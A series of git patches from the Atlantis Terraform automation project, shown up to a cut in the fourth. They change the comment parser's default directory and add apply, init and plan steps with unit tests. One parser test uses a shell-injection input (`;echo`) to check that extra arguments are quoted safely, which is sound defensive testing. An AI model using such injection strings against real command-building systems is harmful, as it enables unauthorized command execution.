From 8ee16a0281b0180c1ca9986a67a99d9c3cb98bd8 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Wed, 21 Mar 2018 17:12:17 -0700 Subject: [PATCH 01/69] By default atlantis plan will run in root dir. This change makes things cleaner because there will only ever be one plan generated in the comment flow. It's okay to make this change because typing the plan command a couple times isn't too bad AND we're going to be implementing autoplanning which should handle most of the times you needed to type plan from before. --- server/events/comment_parser.go | 13 ++++---- server/events/comment_parser_test.go | 25 ++++++--------- server/events/event_parser.go | 33 +++++++++++++++---- server/events/event_parser_test.go | 48 ++++++++++++++++++++++++++++ 4 files changed, 91 insertions(+), 28 deletions(-) diff --git a/server/events/comment_parser.go b/server/events/comment_parser.go index d0e921d79e..2c9e1b0c1b 100644 --- a/server/events/comment_parser.go +++ b/server/events/comment_parser.go @@ -31,6 +31,8 @@ const ( DirFlagShort = "d" VerboseFlagLong = "verbose" VerboseFlagShort = "" + DefaultWorkspace = "default" + DefaultDir = "." ) //go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_comment_parsing.go CommentParsing @@ -135,21 +137,20 @@ func (e *CommentParser) Parse(comment string, vcsHost models.VCSHostType) Commen var name CommandName // Set up the flag parsing depending on the command. - const defaultWorkspace = "default" switch command { case Plan.String(): name = Plan flagSet = pflag.NewFlagSet(Plan.String(), pflag.ContinueOnError) flagSet.SetOutput(ioutil.Discard) - flagSet.StringVarP(&workspace, WorkspaceFlagLong, WorkspaceFlagShort, defaultWorkspace, "Switch to this Terraform workspace before planning.") - flagSet.StringVarP(&dir, DirFlagLong, DirFlagShort, "", "Which directory to run plan in relative to root of repo. Use '.' for root. If not specified, will attempt to run plan for all Terraform projects we think were modified in this changeset.") + flagSet.StringVarP(&workspace, WorkspaceFlagLong, WorkspaceFlagShort, DefaultWorkspace, "Switch to this Terraform workspace before planning.") + flagSet.StringVarP(&dir, DirFlagLong, DirFlagShort, DefaultDir, "Which directory to run plan in relative to root of repo, ex. 'child/dir'.") flagSet.BoolVarP(&verbose, VerboseFlagLong, VerboseFlagShort, false, "Append Atlantis log to comment.") case Apply.String(): name = Apply flagSet = pflag.NewFlagSet(Apply.String(), pflag.ContinueOnError) flagSet.SetOutput(ioutil.Discard) - flagSet.StringVarP(&workspace, WorkspaceFlagLong, WorkspaceFlagShort, defaultWorkspace, "Apply the plan for this Terraform workspace.") - flagSet.StringVarP(&dir, DirFlagLong, DirFlagShort, "", "Apply the plan for this directory, relative to root of repo. Use '.' for root. If not specified, will run apply against all plans created for this workspace.") + flagSet.StringVarP(&workspace, WorkspaceFlagLong, WorkspaceFlagShort, DefaultWorkspace, "Apply the plan for this Terraform workspace.") + flagSet.StringVarP(&dir, DirFlagLong, DirFlagShort, DefaultDir, "Apply the plan for this directory, relative to root of repo, ex. 'child/dir'.") flagSet.BoolVarP(&verbose, VerboseFlagLong, VerboseFlagShort, false, "Append Atlantis log to comment.") default: return CommentParseResult{CommentResponse: fmt.Sprintf("Error: unknown command %q – this is a bug", command)} @@ -198,7 +199,7 @@ func (e *CommentParser) Parse(comment string, vcsHost models.VCSHostType) Commen } return CommentParseResult{ - Command: &Command{Name: name, Verbose: verbose, Workspace: workspace, Dir: dir, Flags: extraArgs}, + Command: NewCommand(dir, extraArgs, name, verbose, workspace), } } diff --git a/server/events/comment_parser_test.go b/server/events/comment_parser_test.go index 87b14f358b..81fe4da9f8 100644 --- a/server/events/comment_parser_test.go +++ b/server/events/comment_parser_test.go @@ -31,8 +31,6 @@ var commentParser = events.CommentParser{ } func TestParse_Ignored(t *testing.T) { - t.Log("given a comment that should be ignored we should set " + - "CommentParseResult.Ignore to true") ignoreComments := []string{ "", "a", @@ -47,8 +45,6 @@ func TestParse_Ignored(t *testing.T) { } func TestParse_HelpResponse(t *testing.T) { - t.Log("given a comment that should result in help output we " + - "should set CommentParseResult.CommentResult") helpComments := []string{ "run", "atlantis", @@ -271,7 +267,7 @@ func TestParse_Parsing(t *testing.T) { { "", "default", - "", + ".", false, "", }, @@ -279,7 +275,7 @@ func TestParse_Parsing(t *testing.T) { { "-w workspace", "workspace", - "", + ".", false, "", }, @@ -293,7 +289,7 @@ func TestParse_Parsing(t *testing.T) { { "--verbose", "default", - "", + ".", true, "", }, @@ -330,7 +326,7 @@ func TestParse_Parsing(t *testing.T) { { "-w workspace -- -d dir --verbose", "workspace", - "", + ".", false, "\"-d\" \"dir\" \"--verbose\"", }, @@ -338,7 +334,7 @@ func TestParse_Parsing(t *testing.T) { { "--", "default", - "", + ".", false, "", }, @@ -346,7 +342,7 @@ func TestParse_Parsing(t *testing.T) { { "-- \";echo \"hi", "default", - "", + ".", false, `"\";echo" "\"hi"`, }, @@ -430,10 +426,8 @@ func TestParse_Parsing(t *testing.T) { } var PlanUsage = `Usage of plan: - -d, --dir string Which directory to run plan in relative to root of repo. - Use '.' for root. If not specified, will attempt to run - plan for all Terraform projects we think were modified in - this changeset. + -d, --dir string Which directory to run plan in relative to root of repo, + ex. 'child/dir'. (default ".") --verbose Append Atlantis log to comment. -w, --workspace string Switch to this Terraform workspace before planning. (default "default") @@ -441,8 +435,7 @@ var PlanUsage = `Usage of plan: var ApplyUsage = `Usage of apply: -d, --dir string Apply the plan for this directory, relative to root of - repo. Use '.' for root. If not specified, will run apply - against all plans created for this workspace. + repo, ex. 'child/dir'. (default ".") --verbose Append Atlantis log to comment. -w, --workspace string Apply the plan for this Terraform workspace. (default "default") diff --git a/server/events/event_parser.go b/server/events/event_parser.go index d42e4beda0..cd3e36f5b3 100644 --- a/server/events/event_parser.go +++ b/server/events/event_parser.go @@ -14,6 +14,7 @@ package events import ( + "path" "regexp" "github.com/google/go-github/github" @@ -32,14 +33,34 @@ var multiLineRegex = regexp.MustCompile(`.*\r?\n.+`) //go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_event_parsing.go EventParsing type Command struct { - Name CommandName - Workspace string - Verbose bool - Flags []string // Dir is the path relative to the repo root to run the command in. - // If empty string then it wasn't specified. "." is the root of the repo. - // Dir will never end in "/". + // Will never be an empty string and will never end in "/". Dir string + // Flags are the extra arguments appended to comment, + // ex. atlantis plan -- -target=resource + Flags []string + Name CommandName + Verbose bool + Workspace string +} + +// NewCommand constructs a Command, setting all missing fields to defaults. +func NewCommand(dir string, flags []string, name CommandName, verbose bool, workspace string) *Command { + // If dir was an empty string, this will return '.'. + validDir := path.Clean(dir) + if validDir == "/" { + validDir = "." + } + if workspace == "" { + workspace = DefaultWorkspace + } + return &Command{ + Dir: validDir, + Flags: flags, + Name: name, + Verbose: verbose, + Workspace: workspace, + } } type EventParsing interface { diff --git a/server/events/event_parser_test.go b/server/events/event_parser_test.go index 9928dc69c9..dbd4b515e4 100644 --- a/server/events/event_parser_test.go +++ b/server/events/event_parser_test.go @@ -257,6 +257,54 @@ func TestParseGitlabMergeCommentEvent(t *testing.T) { }, user) } +func TestNewCommand_CleansDir(t *testing.T) { + cases := []struct { + Dir string + ExpDir string + }{ + { + "", + ".", + }, + { + "/", + ".", + }, + { + "./", + ".", + }, + // We rely on our callers to not pass in relative dirs. + { + "..", + "..", + }, + } + + for _, c := range cases { + t.Run(c.Dir, func(t *testing.T) { + cmd := events.NewCommand(c.Dir, nil, events.Plan, false, "workspace") + Equals(t, c.ExpDir, cmd.Dir) + }) + } +} + +func TestNewCommand_EmptyWorkspace(t *testing.T) { + cmd := events.NewCommand("dir", nil, events.Plan, false, "") + Equals(t, "default", cmd.Workspace) +} + +func TestNewCommand_AllFieldsSet(t *testing.T) { + cmd := events.NewCommand("dir", []string{"a", "b"}, events.Plan, true, "workspace") + Equals(t, events.Command{ + Workspace: "workspace", + Dir: "dir", + Verbose: true, + Flags: []string{"a", "b"}, + Name: events.Plan, + }, *cmd) +} + var mergeEventJSON = `{ "object_kind": "merge_request", "user": { From 6dc0e3c3f355bb5565b1d2eed658aa92fc9cd8a4 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Thu, 22 Mar 2018 11:56:33 -0700 Subject: [PATCH 02/69] Implement apply step. --- server/events/atlantisyaml/apply_step.go | 28 ++++++ server/events/atlantisyaml/apply_step_test.go | 89 +++++++++++++++++++ 2 files changed, 117 insertions(+) create mode 100644 server/events/atlantisyaml/apply_step.go create mode 100644 server/events/atlantisyaml/apply_step_test.go diff --git a/server/events/atlantisyaml/apply_step.go b/server/events/atlantisyaml/apply_step.go new file mode 100644 index 0000000000..c75d4ae3c2 --- /dev/null +++ b/server/events/atlantisyaml/apply_step.go @@ -0,0 +1,28 @@ +package atlantisyaml + +import ( + "fmt" + "os" + "path/filepath" + + "github.com/runatlantis/atlantis/server/events/vcs" +) + +// ApplyStep runs `terraform apply`. +type ApplyStep struct { + ExtraArgs []string + VCSClient vcs.ClientProxy + TerraformExecutor TerraformExec + Meta StepMeta +} + +func (a *ApplyStep) Run() (string, error) { + planPath := filepath.Join(a.Meta.AbsolutePath, a.Meta.Workspace+".tfplan") + stat, err := os.Stat(planPath) + if err != nil || stat.IsDir() { + return "", fmt.Errorf("no plan found at path %q and workspace %q–did you run plan?", a.Meta.DirRelativeToRepoRoot, a.Meta.Workspace) + } + + tfApplyCmd := append(append(append([]string{"apply", "-no-color"}, a.ExtraArgs...), a.Meta.ExtraCommentArgs...), planPath) + return a.TerraformExecutor.RunCommandWithVersion(a.Meta.Log, a.Meta.AbsolutePath, tfApplyCmd, a.Meta.TerraformVersion, a.Meta.Workspace) +} diff --git a/server/events/atlantisyaml/apply_step_test.go b/server/events/atlantisyaml/apply_step_test.go new file mode 100644 index 0000000000..081774ace1 --- /dev/null +++ b/server/events/atlantisyaml/apply_step_test.go @@ -0,0 +1,89 @@ +package atlantisyaml_test + +import ( + "io/ioutil" + "os" + "path/filepath" + "testing" + + "github.com/hashicorp/go-version" + . "github.com/petergtz/pegomock" + "github.com/runatlantis/atlantis/server/events/atlantisyaml" + "github.com/runatlantis/atlantis/server/events/mocks/matchers" + matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers" + "github.com/runatlantis/atlantis/server/events/terraform/mocks" + . "github.com/runatlantis/atlantis/testing" +) + +func TestRun_NoDir(t *testing.T) { + s := atlantisyaml.ApplyStep{ + Meta: atlantisyaml.StepMeta{ + Workspace: "workspace", + AbsolutePath: "nonexistent/path", + DirRelativeToRepoRoot: ".", + TerraformVersion: nil, + ExtraCommentArgs: nil, + Username: "username", + }, + } + _, err := s.Run() + ErrEquals(t, "no plan found at path \".\" and workspace \"workspace\"–did you run plan?", err) +} + +func TestRun_NoPlanFile(t *testing.T) { + tmpDir, cleanup := applyTestTmpDir(t) + defer cleanup() + + s := atlantisyaml.ApplyStep{ + Meta: atlantisyaml.StepMeta{ + Workspace: "workspace", + AbsolutePath: tmpDir, + DirRelativeToRepoRoot: ".", + TerraformVersion: nil, + ExtraCommentArgs: nil, + Username: "username", + }, + } + _, err := s.Run() + ErrEquals(t, "no plan found at path \".\" and workspace \"workspace\"–did you run plan?", err) +} + +func TestRun_Success(t *testing.T) { + tmpDir, cleanup := applyTestTmpDir(t) + defer cleanup() + planPath := filepath.Join(tmpDir, "workspace.tfplan") + err := ioutil.WriteFile(planPath, nil, 0644) + Ok(t, err) + + RegisterMockTestingT(t) + terraform := mocks.NewMockClient() + + tfVersion, _ := version.NewVersion("0.11.4") + s := atlantisyaml.ApplyStep{ + Meta: atlantisyaml.StepMeta{ + Workspace: "workspace", + AbsolutePath: tmpDir, + DirRelativeToRepoRoot: ".", + TerraformVersion: tfVersion, + ExtraCommentArgs: []string{"comment", "args"}, + Username: "username", + }, + ExtraArgs: []string{"extra", "args"}, + TerraformExecutor: terraform, + } + + When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())). + ThenReturn("output", nil) + output, err := s.Run() + Ok(t, err) + Equals(t, "output", output) + terraform.VerifyWasCalledOnce().RunCommandWithVersion(nil, tmpDir, []string{"apply", "-no-color", "extra", "args", "comment", "args", planPath}, tfVersion, "workspace") +} + +// applyTestTmpDir creates a temporary directory and returns its path along +// with a cleanup function to be called via defer. +func applyTestTmpDir(t *testing.T) (string, func()) { + tmpDir, err := ioutil.TempDir("", "") + Ok(t, err) + return tmpDir, func() { os.RemoveAll(tmpDir) } +} From 692e4144ed7c9daf9cc6557f57ebf515a6bc9b73 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Thu, 22 Mar 2018 12:09:08 -0700 Subject: [PATCH 03/69] Implement init step. --- server/events/atlantisyaml/init_step.go | 32 +++++++++ server/events/atlantisyaml/init_step_test.go | 70 ++++++++++++++++++++ 2 files changed, 102 insertions(+) create mode 100644 server/events/atlantisyaml/init_step.go create mode 100644 server/events/atlantisyaml/init_step_test.go diff --git a/server/events/atlantisyaml/init_step.go b/server/events/atlantisyaml/init_step.go new file mode 100644 index 0000000000..a25cb94fe4 --- /dev/null +++ b/server/events/atlantisyaml/init_step.go @@ -0,0 +1,32 @@ +package atlantisyaml + +import "github.com/hashicorp/go-version" + +// InitStep runs `terraform init`. +type InitStep struct { + ExtraArgs []string + TerraformExecutor TerraformExec + Meta StepMeta +} + +func (i *InitStep) Run() (string, error) { + // If we're running < 0.9 we have to use `terraform get` instead of `init`. + if MustConstraint("< 0.9.0").Check(i.Meta.TerraformVersion) { + i.Meta.Log.Info("running terraform version %s so will use `get` instead of `init`", i.Meta.TerraformVersion) + terraformGetCmd := append([]string{"get", "-no-color"}, i.ExtraArgs...) + _, err := i.TerraformExecutor.RunCommandWithVersion(i.Meta.Log, i.Meta.AbsolutePath, terraformGetCmd, i.Meta.TerraformVersion, i.Meta.Workspace) + return "", err + } else { + _, err := i.TerraformExecutor.RunCommandWithVersion(i.Meta.Log, i.Meta.AbsolutePath, append([]string{"init", "-no-color"}, i.ExtraArgs...), i.Meta.TerraformVersion, i.Meta.Workspace) + return "", err + } +} + +// MustConstraint returns a constraint. It panics on error. +func MustConstraint(constraint string) version.Constraints { + c, err := version.NewConstraint(constraint) + if err != nil { + panic(err) + } + return c +} diff --git a/server/events/atlantisyaml/init_step_test.go b/server/events/atlantisyaml/init_step_test.go new file mode 100644 index 0000000000..8704f832df --- /dev/null +++ b/server/events/atlantisyaml/init_step_test.go @@ -0,0 +1,70 @@ +package atlantisyaml_test + +import ( + "testing" + + "github.com/hashicorp/go-version" + . "github.com/petergtz/pegomock" + "github.com/runatlantis/atlantis/server/events/atlantisyaml" + "github.com/runatlantis/atlantis/server/events/mocks/matchers" + matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers" + "github.com/runatlantis/atlantis/server/events/terraform/mocks" + "github.com/runatlantis/atlantis/server/logging" + . "github.com/runatlantis/atlantis/testing" +) + +func TestRun_UsesGetOrInitForRightVersion(t *testing.T) { + RegisterMockTestingT(t) + cases := []struct { + version string + expCmd string + }{ + { + "0.8.9", + "get", + }, + { + "0.9.0", + "init", + }, + { + "0.9.1", + "init", + }, + { + "0.10.0", + "init", + }, + } + + for _, c := range cases { + t.Run(c.version, func(t *testing.T) { + terraform := mocks.NewMockClient() + + tfVersion, _ := version.NewVersion(c.version) + logger := logging.NewNoopLogger() + s := atlantisyaml.InitStep{ + Meta: atlantisyaml.StepMeta{ + Log: logger, + Workspace: "workspace", + AbsolutePath: "/path", + DirRelativeToRepoRoot: ".", + TerraformVersion: tfVersion, + ExtraCommentArgs: []string{"comment", "args"}, + Username: "username", + }, + ExtraArgs: []string{"extra", "args"}, + TerraformExecutor: terraform, + } + + When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())). + ThenReturn("output", nil) + output, err := s.Run() + Ok(t, err) + // Shouldn't return output since we don't print init output to PR. + Equals(t, "", output) + + terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, "/path", []string{c.expCmd, "-no-color", "extra", "args"}, tfVersion, "workspace") + }) + } +} From 464cd51eaeb65466bfbb2da7b457fd49bb0a55a4 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Thu, 22 Mar 2018 13:36:56 -0700 Subject: [PATCH 04/69] Implement plan step. --- server/events/atlantisyaml/apply_step_test.go | 8 +- server/events/atlantisyaml/plan_step.go | 94 ++++++ server/events/atlantisyaml/plan_step_test.go | 285 ++++++++++++++++++ 3 files changed, 383 insertions(+), 4 deletions(-) create mode 100644 server/events/atlantisyaml/plan_step.go create mode 100644 server/events/atlantisyaml/plan_step_test.go diff --git a/server/events/atlantisyaml/apply_step_test.go b/server/events/atlantisyaml/apply_step_test.go index 081774ace1..0502ab2e1f 100644 --- a/server/events/atlantisyaml/apply_step_test.go +++ b/server/events/atlantisyaml/apply_step_test.go @@ -31,7 +31,7 @@ func TestRun_NoDir(t *testing.T) { } func TestRun_NoPlanFile(t *testing.T) { - tmpDir, cleanup := applyTestTmpDir(t) + tmpDir, cleanup := tmpDir_stepTests(t) defer cleanup() s := atlantisyaml.ApplyStep{ @@ -49,7 +49,7 @@ func TestRun_NoPlanFile(t *testing.T) { } func TestRun_Success(t *testing.T) { - tmpDir, cleanup := applyTestTmpDir(t) + tmpDir, cleanup := tmpDir_stepTests(t) defer cleanup() planPath := filepath.Join(tmpDir, "workspace.tfplan") err := ioutil.WriteFile(planPath, nil, 0644) @@ -80,9 +80,9 @@ func TestRun_Success(t *testing.T) { terraform.VerifyWasCalledOnce().RunCommandWithVersion(nil, tmpDir, []string{"apply", "-no-color", "extra", "args", "comment", "args", planPath}, tfVersion, "workspace") } -// applyTestTmpDir creates a temporary directory and returns its path along +// tmpDir_stepTests creates a temporary directory and returns its path along // with a cleanup function to be called via defer. -func applyTestTmpDir(t *testing.T) (string, func()) { +func tmpDir_stepTests(t *testing.T) (string, func()) { tmpDir, err := ioutil.TempDir("", "") Ok(t, err) return tmpDir, func() { os.RemoveAll(tmpDir) } diff --git a/server/events/atlantisyaml/plan_step.go b/server/events/atlantisyaml/plan_step.go new file mode 100644 index 0000000000..646506381b --- /dev/null +++ b/server/events/atlantisyaml/plan_step.go @@ -0,0 +1,94 @@ +package atlantisyaml + +import ( + "fmt" + "os" + "path/filepath" + "strings" +) + +// atlantisUserTFVar is the name of the variable we execute terraform +// with, containing the vcs username of who is running the command +const atlantisUserTFVar = "atlantis_user" +const defaultWorkspace = "default" + +// PlanStep runs `terraform plan`. +type PlanStep struct { + ExtraArgs []string + TerraformExecutor TerraformExec + Meta StepMeta +} + +func (p *PlanStep) Run() (string, error) { + // We only need to switch workspaces in version 0.9.*. In older versions, + // there is no such thing as a workspace so we don't need to do anything. + // In newer versions, the TF_WORKSPACE env var is respected and will handle + // using the right workspace and even creating it if it doesn't exist. + // This variable is set inside the Terraform executor. + if err := p.switchWorkspace(); err != nil { + return "", err + } + + planFile := filepath.Join(p.Meta.AbsolutePath, fmt.Sprintf("%s.tfplan", p.Meta.Workspace)) + userVar := fmt.Sprintf("%s=%s", atlantisUserTFVar, p.Meta.Username) + tfPlanCmd := append(append([]string{"plan", "-refresh", "-no-color", "-out", planFile, "-var", userVar}, p.ExtraArgs...), p.Meta.ExtraCommentArgs...) + + // Check if env/{workspace}.tfvars exist and include it. This is a use-case + // from Hootsuite where Atlantis was first created so we're keeping this as + // an homage and a favor so they don't need to refactor all their repos. + // It's also a nice way to structure your repos to reduce duplication. + optionalEnvFile := filepath.Join(p.Meta.AbsolutePath, "env", p.Meta.Workspace+".tfvars") + if _, err := os.Stat(optionalEnvFile); err == nil { + tfPlanCmd = append(tfPlanCmd, "-var-file", optionalEnvFile) + } + + return p.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, filepath.Join(p.Meta.AbsolutePath), tfPlanCmd, p.Meta.TerraformVersion, p.Meta.Workspace) +} + +// switchWorkspace changes the terraform workspace if necessary and will create +// it if it doesn't exist. It handles differences between versions. +func (p *PlanStep) switchWorkspace() error { + // In versions less than 0.9 there is no support for workspaces. + noWorkspaceSupport := MustConstraint("<0.9").Check(p.Meta.TerraformVersion) + if noWorkspaceSupport && p.Meta.Workspace != defaultWorkspace { + return fmt.Errorf("terraform version %s does not support workspaces", p.Meta.TerraformVersion) + } + if noWorkspaceSupport { + return nil + } + + // In version 0.9.* the workspace command was called env. + workspaceCmd := "workspace" + runningZeroPointNine := MustConstraint(">=0.9,<0.10").Check(p.Meta.TerraformVersion) + if runningZeroPointNine { + workspaceCmd = "env" + } + + // Use `workspace show` to find out what workspace we're in now. If we're + // already in the right workspace then no need to switch. This will save us + // about ten seconds. This command is only available in > 0.10. + if !runningZeroPointNine { + workspaceShowOutput, err := p.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, p.Meta.AbsolutePath, []string{workspaceCmd, "show"}, p.Meta.TerraformVersion, p.Meta.Workspace) + if err != nil { + return err + } + // If `show` says we're already on this workspace then we're done. + if strings.TrimSpace(workspaceShowOutput) == p.Meta.Workspace { + return nil + } + } + + // Finally we'll have to select the workspace. Although we end up running + // with TF_WORKSPACE set, we need to figure out if this workspace exists so + // we can create it if it doesn't. To do this we can either select and catch + // the error or use list and then look for the workspace. Both commands take + // the same amount of time so that's why we're running select here. + _, err := p.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, p.Meta.AbsolutePath, []string{workspaceCmd, "select", "-no-color", p.Meta.Workspace}, p.Meta.TerraformVersion, p.Meta.Workspace) + if err != nil { + // If terraform workspace select fails we run terraform workspace + // new to create a new workspace automatically. + _, err = p.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, p.Meta.AbsolutePath, []string{workspaceCmd, "new", "-no-color", p.Meta.Workspace}, p.Meta.TerraformVersion, p.Meta.Workspace) + return err + } + return nil +} diff --git a/server/events/atlantisyaml/plan_step_test.go b/server/events/atlantisyaml/plan_step_test.go new file mode 100644 index 0000000000..d5d7502992 --- /dev/null +++ b/server/events/atlantisyaml/plan_step_test.go @@ -0,0 +1,285 @@ +package atlantisyaml_test + +import ( + "errors" + "io/ioutil" + "os" + "path/filepath" + "testing" + + "github.com/hashicorp/go-version" + . "github.com/petergtz/pegomock" + "github.com/runatlantis/atlantis/server/events/atlantisyaml" + "github.com/runatlantis/atlantis/server/events/mocks/matchers" + matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers" + "github.com/runatlantis/atlantis/server/events/terraform/mocks" + "github.com/runatlantis/atlantis/server/logging" + . "github.com/runatlantis/atlantis/testing" +) + +func TestRun_NoWorkspaceIn08(t *testing.T) { + // We don't want any workspace commands to be run in 0.8. + RegisterMockTestingT(t) + terraform := mocks.NewMockClient() + + tfVersion, _ := version.NewVersion("0.8") + logger := logging.NewNoopLogger() + workspace := "default" + s := atlantisyaml.PlanStep{ + Meta: atlantisyaml.StepMeta{ + Log: logger, + Workspace: workspace, + AbsolutePath: "/path", + DirRelativeToRepoRoot: ".", + TerraformVersion: tfVersion, + ExtraCommentArgs: []string{"comment", "args"}, + Username: "username", + }, + ExtraArgs: []string{"extra", "args"}, + TerraformExecutor: terraform, + } + + When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())). + ThenReturn("output", nil) + output, err := s.Run() + Ok(t, err) + + Equals(t, "output", output) + terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, "/path", []string{"plan", "-refresh", "-no-color", "-out", "/path/default.tfplan", "-var", "atlantis_user=username", "extra", "args", "comment", "args"}, tfVersion, workspace) + + // Verify that no env or workspace commands were run + terraform.VerifyWasCalled(Never()).RunCommandWithVersion(logger, "/path", []string{"env", "select", "-no-color", "workspace"}, tfVersion, workspace) + terraform.VerifyWasCalled(Never()).RunCommandWithVersion(logger, "/path", []string{"workspace", "select", "-no-color", "workspace"}, tfVersion, workspace) +} + +func TestRun_ErrWorkspaceIn08(t *testing.T) { + // If they attempt to use a workspace other than default in 0.8 + // we should error. + RegisterMockTestingT(t) + terraform := mocks.NewMockClient() + + tfVersion, _ := version.NewVersion("0.8") + logger := logging.NewNoopLogger() + workspace := "notdefault" + s := atlantisyaml.PlanStep{ + Meta: atlantisyaml.StepMeta{ + Log: logger, + Workspace: workspace, + AbsolutePath: "/path", + DirRelativeToRepoRoot: ".", + TerraformVersion: tfVersion, + ExtraCommentArgs: []string{"comment", "args"}, + Username: "username", + }, + ExtraArgs: []string{"extra", "args"}, + TerraformExecutor: terraform, + } + + When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())). + ThenReturn("output", nil) + _, err := s.Run() + ErrEquals(t, "terraform version 0.8.0 does not support workspaces", err) +} + +func TestRun_SwitchesWorkspace(t *testing.T) { + RegisterMockTestingT(t) + + cases := []struct { + tfVersion string + expWorkspaceCmd string + }{ + { + "0.9.0", + "env", + }, + { + "0.9.11", + "env", + }, + { + "0.10.0", + "workspace", + }, + { + "0.11.0", + "workspace", + }, + } + + for _, c := range cases { + t.Run(c.tfVersion, func(t *testing.T) { + terraform := mocks.NewMockClient() + + tfVersion, _ := version.NewVersion(c.tfVersion) + logger := logging.NewNoopLogger() + s := atlantisyaml.PlanStep{ + Meta: atlantisyaml.StepMeta{ + Log: logger, + Workspace: "workspace", + AbsolutePath: "/path", + DirRelativeToRepoRoot: ".", + TerraformVersion: tfVersion, + ExtraCommentArgs: []string{"comment", "args"}, + Username: "username", + }, + ExtraArgs: []string{"extra", "args"}, + TerraformExecutor: terraform, + } + + When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())). + ThenReturn("output", nil) + output, err := s.Run() + Ok(t, err) + + Equals(t, "output", output) + // Verify that env select was called as well as plan. + terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, "/path", []string{c.expWorkspaceCmd, "select", "-no-color", "workspace"}, tfVersion, "workspace") + terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, "/path", []string{"plan", "-refresh", "-no-color", "-out", "/path/workspace.tfplan", "-var", "atlantis_user=username", "extra", "args", "comment", "args"}, tfVersion, "workspace") + }) + } +} + +func TestRun_CreatesWorkspace(t *testing.T) { + // Test that if `workspace select` fails, we call `workspace new`. + RegisterMockTestingT(t) + + cases := []struct { + tfVersion string + expWorkspaceCommand string + }{ + { + "0.9.0", + "env", + }, + { + "0.9.11", + "env", + }, + { + "0.10.0", + "workspace", + }, + { + "0.11.0", + "workspace", + }, + } + + for _, c := range cases { + t.Run(c.tfVersion, func(t *testing.T) { + terraform := mocks.NewMockClient() + tfVersion, _ := version.NewVersion(c.tfVersion) + logger := logging.NewNoopLogger() + s := atlantisyaml.PlanStep{ + Meta: atlantisyaml.StepMeta{ + Log: logger, + Workspace: "workspace", + AbsolutePath: "/path", + DirRelativeToRepoRoot: ".", + TerraformVersion: tfVersion, + ExtraCommentArgs: []string{"comment", "args"}, + Username: "username", + }, + ExtraArgs: []string{"extra", "args"}, + TerraformExecutor: terraform, + } + + // Ensure that we actually try to switch workspaces by making the + // output of `workspace show` to be a different name. + When(terraform.RunCommandWithVersion(logger, "/path", []string{"workspace", "show"}, tfVersion, "workspace")).ThenReturn("diffworkspace\n", nil) + + expWorkspaceArgs := []string{c.expWorkspaceCommand, "select", "-no-color", "workspace"} + When(terraform.RunCommandWithVersion(logger, "/path", expWorkspaceArgs, tfVersion, "workspace")).ThenReturn("", errors.New("workspace does not exist")) + + expPlanArgs := []string{"plan", "-refresh", "-no-color", "-out", "/path/workspace.tfplan", "-var", "atlantis_user=username", "extra", "args", "comment", "args"} + When(terraform.RunCommandWithVersion(logger, "/path", expPlanArgs, tfVersion, "workspace")).ThenReturn("output", nil) + + output, err := s.Run() + Ok(t, err) + + Equals(t, "output", output) + // Verify that env select was called as well as plan. + terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, "/path", expWorkspaceArgs, tfVersion, "workspace") + terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, "/path", expPlanArgs, tfVersion, "workspace") + }) + } +} + +func TestRun_NoWorkspaceSwitchIfNotNecessary(t *testing.T) { + // Tests that if workspace show says we're on the right workspace we don't + // switch. + RegisterMockTestingT(t) + terraform := mocks.NewMockClient() + tfVersion, _ := version.NewVersion("0.10.0") + logger := logging.NewNoopLogger() + s := atlantisyaml.PlanStep{ + Meta: atlantisyaml.StepMeta{ + Log: logger, + Workspace: "workspace", + AbsolutePath: "/path", + DirRelativeToRepoRoot: ".", + TerraformVersion: tfVersion, + ExtraCommentArgs: []string{"comment", "args"}, + Username: "username", + }, + ExtraArgs: []string{"extra", "args"}, + TerraformExecutor: terraform, + } + + When(terraform.RunCommandWithVersion(logger, "/path", []string{"workspace", "show"}, tfVersion, "workspace")).ThenReturn("workspace\n", nil) + + expPlanArgs := []string{"plan", "-refresh", "-no-color", "-out", "/path/workspace.tfplan", "-var", "atlantis_user=username", "extra", "args", "comment", "args"} + When(terraform.RunCommandWithVersion(logger, "/path", expPlanArgs, tfVersion, "workspace")).ThenReturn("output", nil) + + output, err := s.Run() + Ok(t, err) + + Equals(t, "output", output) + terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, "/path", expPlanArgs, tfVersion, "workspace") + + // Verify that workspace select was never called. + terraform.VerifyWasCalled(Never()).RunCommandWithVersion(logger, "/path", []string{"workspace", "select", "-no-color", "workspace"}, tfVersion, "workspace") +} + +func TestRun_AddsEnvVarFile(t *testing.T) { + // Test that if env/workspace.tfvars file exists we use -var-file option. + RegisterMockTestingT(t) + terraform := mocks.NewMockClient() + + // Create the env/workspace.tfvars file. + tmpDir, cleanup := tmpDir_stepTests(t) + defer cleanup() + err := 